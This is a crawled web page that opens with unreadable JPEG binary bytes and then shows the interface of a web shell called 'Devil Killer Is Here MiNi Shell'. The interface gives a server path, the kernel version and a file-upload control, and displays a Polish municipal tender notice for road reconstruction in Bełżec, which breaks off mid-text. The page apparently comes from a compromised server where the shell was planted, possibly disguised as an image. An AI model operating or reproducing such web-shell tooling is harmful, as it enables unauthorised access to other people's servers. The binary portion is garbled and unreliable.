JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221118/0044639701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Poprawa dostępności społeczno – gospodarczej poprzez przebudowę dróg na terenie gminy Bełżec„ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BEŁŻEC</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950014357</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lwowska 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bełżec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-670</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">846652445</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">846652337</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@belzec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.belzec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Poprawa dostępności społeczno – gospodarczej poprzez przebudowę dróg na terenie gminy Bełżec„ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4a1ce180-6729-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00446397</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00017613/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 „Poprawa dostępności społeczno – gospodarczej poprzez przebudowę dróg na terenie gminy Bełżec„</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://belzec.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://belzec.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy znajdującej się pod adresem:<br/>https://belzec.ezamawiajacy.pl w zakładce „Korespondencja” oraz za pośrednictwem poczty elektronicznej na adres e-mail:<br/>gmina@belzec.pl. Ogólne zasady korzystania z Platformy:<br/>a) Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://belzec.ezamawiajacy.pl lub<br/>https://oneplace.marketplanet.pl .<br/>b) Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”.<br/>Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ.<br/>1) Wniosek należy przesłać za pośrednictwem Platformy Zakupowej przez opcję „Zadaj pytanie” lub przy użyciu zakładki<br/>„Korespondencja”. W celu zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE.<br/>Powoduje to otwarcie okna, w którym należy uzupełnić dane Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu<br/>wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ, Wykonawca uzyskuje<br/>potwierdzenie wysłania pytania poprzez komunikat systemowy &#34;Pytanie wysłane&#34;.<br/>2) Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod<br/>warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu<br/>składania odpowiednio ofert.<br/>3) Jeżeli Zamawiający nie udzieli wyjaśnień w terminie, przedłuży termin składania ofert o czas niezbędny do zapoznania się<br/>wszystkich zainteresowanych Wykonawców z wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia odpowiednio ofert<br/>4) W przypadku gdy wniosek o wyjaśnienie treści SWZ nie wpłynął w terminie, o którym mowa w pkt 2), Zamawiający nie ma<br/>obowiązku udzielania odpowiednio wyjaśnień SWZ oraz obowiązku przedłużenia terminu składania odpowiednio ofert<br/>5) Przedłużenie terminu składania ofert, o których mowa w pkt 4), nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści<br/>odpowiednio SWZ.<br/>Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:<br/>a) dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>b) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W<br/>związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.<br/>Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej.<br/>Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp,<br/>doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar,<br/>gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>Zamawiający określa informacje na temat kodowania i czasu odbioru danych W przypadku wnoszenia wadium w formie poręczenia<br/>lub gwarancji: Składając Ofertę w postaci elektronicznej oryginał dokumentu wadium (poręczenia lub gwarancji) opatrzonego<br/>podpisem elektronicznym osób upoważnionych do jego wystawienia, Wykonawca składa załączając na Platformie w zakładce<br/>„OFERTY” – poprzez wybranie polecenia „dodaj dokument&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1, z późn. zm.), dalej RODO, informuję, iż:<br/>1.Administratorem Państwa danych osobowych jest Gmina Bełżec, ul. Lwowska 5, 22-670 Bełżec, adres e-mail: gmina@belzec.pl,<br/>nr tel. 84 6652445.<br/>2.Kontakt z wyznaczonym Inspektorem Ochrony Danych w sprawach dotyczących przetwarzania Państwa danych osobowych oraz<br/>realizacji przysługujących Państwu praw związanych z ich przetwarzaniem możliwy jest pod adresem e-mail: iod@data-partners.pl.<br/>3.Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO, w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego na „Poprawa dostępności społeczno – gospodarczej poprzez przebudowę dróg na terenie gminy<br/>Ogłoszenie nr 2022/BZP 00411059/01 z dnia 2022-10-26<br/>2022-10-26 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Bełżec.„ prowadzonego w trybie podstawowym.<br/>4.Odbiorcami Państwa danych osobowych mogą być osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania na podstawie art. 18 oraz art. 74 Ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych dalej „Ustawa Pzp”<br/>oraz podmioty, z którymi zawarto umowy powierzenia przetwarzania danych osobowych.<br/>5.Państwa dane osobowe będą przechowywane, zgodnie z art. 78 Ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia. Jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, dane osobowe<br/>przechowywane będą przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>6.Posiadają Państwo:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących*;<br/>- na podstawie art. 16 RODO prawo do sprostowania danych osobowych Państwa dotyczących**;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych z siedzibą ul. Stawki 2, 00-193 Warszawa, gdy<br/>Państwo uznają, że przetwarzanie danych osobowych dotyczących Państwa narusza przepisy RODO.<br/>*Wyjaśnienie: w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o<br/>którym mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, zamawiający może żądać od osoby występującej z żądaniem wskazania<br/>dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>**Wyjaśnienie: skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym<br/>mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy<br/>w sprawie zamówienia publicznego w zakresie niezgodnym<br/>z ustawą.<br/>***Wyjaśnienie: w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania,<br/>o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Państwu:<br/>- w związku z art. 17 RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>8.Podanie przez Państwa danych osobowych jest niezbędne do przeprowadzenia postępowania<br/>o udzielenie zamówienia publicznego. Niepodanie danych osobowych wyłącza możliwość udziału w wyżej wymienionym<br/>postepowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 5200000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1 „Budowa połączenia drogi gminnej nr 127550L, pomiędzy drogą wojewódzką nr 865 i gminnym zakładem<br/>ujęcia wody w m. Bełżec”<br/>Przedmiot inwestycji składa się z nw. robót:<br/>1. „Budowa skrzyżowania drogi wojewódzkiej nr 865 w km 71+749.50<br/>z drogą gminną nr 127550L, na działce nr ewid. 1820 w m. Bełżec” (Decyzja Wojewody Lubelskiego nr 159/21 z dnia 2<br/>grudnia 2021r.)<br/>2. „Budowa połączenia drogi gminnej nr 127550L, pomiędzy drogą wojewódzką nr 865 i gminnym zakładem ujęcia wody w<br/>m. Bełżec, na odcinku: km 0+003.50 ÷ 0+128.64 i km 0+144.37 ÷ 0+534.70” (Decyzja Starosty Tomaszowskiego<br/>AB.6740.27.2022z dnia 27 stycznia 2022r.) Lokalizacja : km 0+008.80÷0+128.64 i km 0+144.37 ÷ 0+534.70”,<br/>3. Przebudowa przejazdu kolejowego kat. D. linii kolejowej nr 69 Rejowiec – Hrebenne w km 120.250 na skrzyżowaniu z<br/>drogą gminną nr 127550L w m. Bełżec (Zgłoszenie do Wojewody Lubelskiego<br/>a/. budowę drogi klasy D i przebudowę skrzyżowań<br/>b/. budowa odcinków chodnika, (zasadniczo jednostronnego (do km 0+216.10) o szerokości 2.00m.<br/>c/. poprawa dostępności do przyległych działek, (zjazdy gospodarcze szer. 4.50m, pozostałe, w tym na drogi wewnętrzneszer. 5.0m)<br/>d/. wykonanie powierzchniowo-wgłębnego system odwodnienia uwzględniając istniejące naturalne ukształtowanie terenu<br/>oraz istniejącą i projektowaną infrastrukturę techniczną<br/>d.1. Roboty w pasie drogi wojewódzkiej nr 865<br/>d.2. Roboty w pasie drogi gminnej nr 127550L<br/>d.2.1.Zbiornik retencyjny wód opadowych<br/>d.2.2. Rów odpływowy od granicy terenu zamkniętego do wylotu ze zbiornika retencyjnego<br/>d.2.3. Odprowadzenie wód opadowych z drogi gminnej powyżej projektowanego zbiornika retencyjnego wód opadowych<br/>e/. przebudowa (usunięcie kolizji urządzeń elektroenergetycznych)<br/>f/. budowa oświetlenia ulicznego<br/>g/. budowa linii energetycznej oświetlenia ulicznego w ciągu drogi gminnej nr 127579l ul. Lipowa w Bełżcu działki numer:<br/>2675, 2676, 2677, 2705, 2695, 2716, 2717, 2708<br/>h/. budowa kanału technologicznego<br/>Zakres prac obejmuje wykonanie odcinka kanału technologicznego i montaż 1 szt. studni telekomunikacyjnej na odcinku<br/>robót nr 1, oraz wykonanie odcinków kanału technologicznego i montaż 19szt. studni telekomunikacyjnej na odcinku robót<br/>nr 2.<br/>i/. organizacji ruchu drogowego.<br/>Zakres robót, stałej organizacji ruchu drogowego określony jest w zatwierdzonych projektach. Dla realizacji prac<br/>inwestycyjnych na odcinku określonym w robocie nr 1, należy wykorzystać opracowany i zatwierdzony projekt czasowej<br/>organizacji ruchu, dla roboty nr 2 stosowny projekt wykona Wykonawca robót.<br/>j/. budowa kanału technologicznego<br/>Zakres prac obejmuje wykonanie odcinka kanału technologicznego i montaż 1 szt. studni telekomunikacyjnej na odcinku<br/>Zadania 1, oraz wykonanie odcinków kanału technologicznego i montaż 19szt. studni telekomunikacyjnej na odcinku<br/>Zadania 2.<br/>k/. organizacji ruchu drogowego.<br/>W „zgłoszeniu robót” wskazane są inne zalecenia związane z realizacją robót. Inwestor i jednocześnie Zarządca drogi<br/>gminnej widzi możliwość krótkotrwałych zamknięć czasowych związanych z realizacją zadania, bez konieczności<br/>wykonywania objazdów.<br/>Zadanie nr 2 Przebudowa drogi wewnętrznej w Brzezinach dz. nr 170<br/>1. Przedmiot inwestycji.<br/>Przedmiotem inwestycji jest : „Przebudowa drogi wewnętrznej w miejscowości Brzeziny dz. 170&#34;.<br/>Projekt przewiduje przebudowę drogi poprzez wykonanie jezdni bitumicznej w istniejącym śladzie drogi tłuczniowej, w<br/>granicach pasa drogowego.<br/>Szczegółowe rozwiązania sytuacyjne przedstawiono na załączonej dokumentacji graficznej stanowiące j integralną część<br/>projektu zagospodarowania terenu.<br/>Zadanie nr 3 Przebudowa drogi wewnętrznej w Brzezinach dz. nr 190<br/>1. Przedmiot inwestycji.<br/>Przedmiotem inwestycji jest : „Przebudowa drogi wewnętrznej w miejscowości Brzeziny dz. nr 190”.<br/>Zakres robót będzie obejmować przebudowę drogi wraz z poboczami w granicy pasa drogowego.<br/>Projekt przewiduje przebudowę drogi poprzez wykonanie jezdni bitumicznej w istniejący śladzie drogi tłuczniowej, w<br/>granicach pasa drogowego.<br/>Szczegółowe rozwiązania sytuacyjne przedstawiano na załączonej dokumentacji graficznej stanowiącej integralną część<br/>projektu zagospodarowania terenu.<br/>Zadanie nr 4 Przebudowa drogi wewnętrznej w Brzezinach dz. nr 154<br/>1. Przedmiot inwestycji.<br/>Przedmiotem inwestycji jest „Przebudowa drogi wewnętrznej w miejscowości Brzeziny dz. 154&#34;.<br/>Zakres robót będzie obejmował przebudowę drogi częściowo z poboczami w granicy pasa drogowego. Szczegółowy zakres<br/>opracowania obrazuje „Projekt zagospodarowania terenu&#34;.<br/>Projekt przewiduje przebudowę drogi poprzez wykonanie jezdni bitumicznej w istniejący śladzie drogi tłuczniowej, w<br/>granicach pasa drogowego<br/>Szczegółowe rozwiązania sytuacyjne przedstawiano na załączonej j dokumentacji graficznej stanowiącej integralną część<br/>projektu zagospodarowania terenu.<br/>Zadanie nr 5 Przebudowa drogi wewnętrznej ul. Partyzantów w Bełżcu dz. nr 592<br/>1. Przedmiot inwestycji.<br/>Przedmiotem inwestycji jest : „Przebudowa drogi wewnętrznej ul. Partyzantów (dz. 592)&#34;.<br/>Zakres robót będzie obejmował przebudowę drogi wraz z poboczami w granicy pasa drogowego.<br/>Projekt przewiduje przebudowę drogi poprzez wykonanie jezdni bitumicznej w istniejący śladzie drogi tłuczniowej, w<br/>granicach pasa drogowego o szerokości 3,50 m.<br/>Szczegółowe rozwiązania sytuacyjne przedstawiano na załączone j dokumentacji graficznej stanowiące j integralną część<br/>projektu zagospodarowania terenu.<br/>Zadanie nr 6 Przebudowa drogi wewnętrznej ul. Partyzantów w Bełżcu dz. nr 2291. Przedmiot inwestycji.<br/>Przedmiotem inwestycji jest : „Przebudowa drogi wewnętrznej ul. Partyzantów (dz. 229) w Bełżcu&#34;.<br/>Zakres robót będzie obejmował przebudowę drogi wraz z poboczami w granicy pasa drogowego.<br/>Projekt przewiduje przebudowę drogi poprzez wykonanie jezdni bitumicznej w istniejący śladzie drogi tłuczniowej, w<br/>granicach pasa drogowego o szerokości 3,50 m.<br/>Szczegółowe rozwiązania sytuacyjne przedstawiano na załączonej j dokumentacji graficznej stanowiące j integralną część<br/>projektu zagospodarowania terenu.<br/>Zadanie nr 7 Przebudowa drogi wewnętrznej ul. Marii Konopnickiej w Bełżcu dz. nr 2944<br/>1. Przedmiot inwestycji.<br/>Przedmiotem inwestycji jest : „Przebudowa drogi wewnętrznej ul. Marii Konopnickiej w Bełżcu”.<br/>Zakres robót będzie obejmował przebudowę drogi wraz z poboczami w granicy pasa drogowego.<br/>Projekt przewiduje przebudowę drogi poprzez wykonanie jezdni bitumicznej w istniejący śladzie drogi tłuczniowej, w<br/>granicach pasa drogowego.<br/>Szczegółowe rozwiązania sytuacyjne przedstawiano na załączonej dokumentacji graficznej stanowiące j integralną część<br/>projektu zagospodarowania terenu.<br/>Zadanie nr 8 Przebudowa drogi wewnętrznej ul. Pogodna w Bełżcu<br/>1. Przedmiot inwestycji.<br/>Przedmiotem inwestycji jest : „Przebudowa drogi wewnętrznej ul. Pogodna dz. 2977 w Bełżcu&#34;.<br/>Zakres robót będzie obejmował przebudowę drogi wraz z poboczami w granicy pasa drogowego.<br/>Projekt przewiduje przebudowę drogi poprzez wykonanie jezdni bitumicznej w istniejącym śladzie drogi tłuczniowej, w<br/>granicach pasa drogowego. Ponadto w ramach zadania przewidziano wykonanie drenu z lewej strony drogi o wymiarach<br/>30,0 x 70,0 cm wypełniony tłuczniem kamiennym frakcji 40/63 mm oraz owinięty geotekstylem.<br/>Szczegółowe rozwiązania sytuacyjne przedstawiano na załączone j dokumentacji graficzne j stanowiące j integralną część<br/>projektu zagospodarowania terenu.<br/>Zadanie nr 9 Przebudowa drogi wewnętrznej ul. Wrzosowa w Bełżcu dz. nr 425, 424<br/>1. Przedmiot inwestycji.<br/>Przedmiotem inwestycji jest : „Przebudowa drogi wewnętrznej ulica Wrzosowa dz. nr 425, 424”.<br/>Projekt przewiduje przebudowę drogi poprzez wykonanie jezdni bitumicznej w istniejącym śladzie drogi tłuczniowej, w<br/>granicach pasa drogowego.<br/>Szczegółowe rozwiązania sytuacyjne przedstawiano na załączonej dokumentacji graficznej stanowiącej integralna część<br/>projektu zagospodarowania terenu.<br/>Zadanie nr 10 Przebudowa drogi wewnętrznej ul. Hetmańska w Bełżcu<br/>Przedmiot inwestycji.<br/>Przedmiotem inwestycji jest : „Przebudowa drogi wewnętrznej ul. 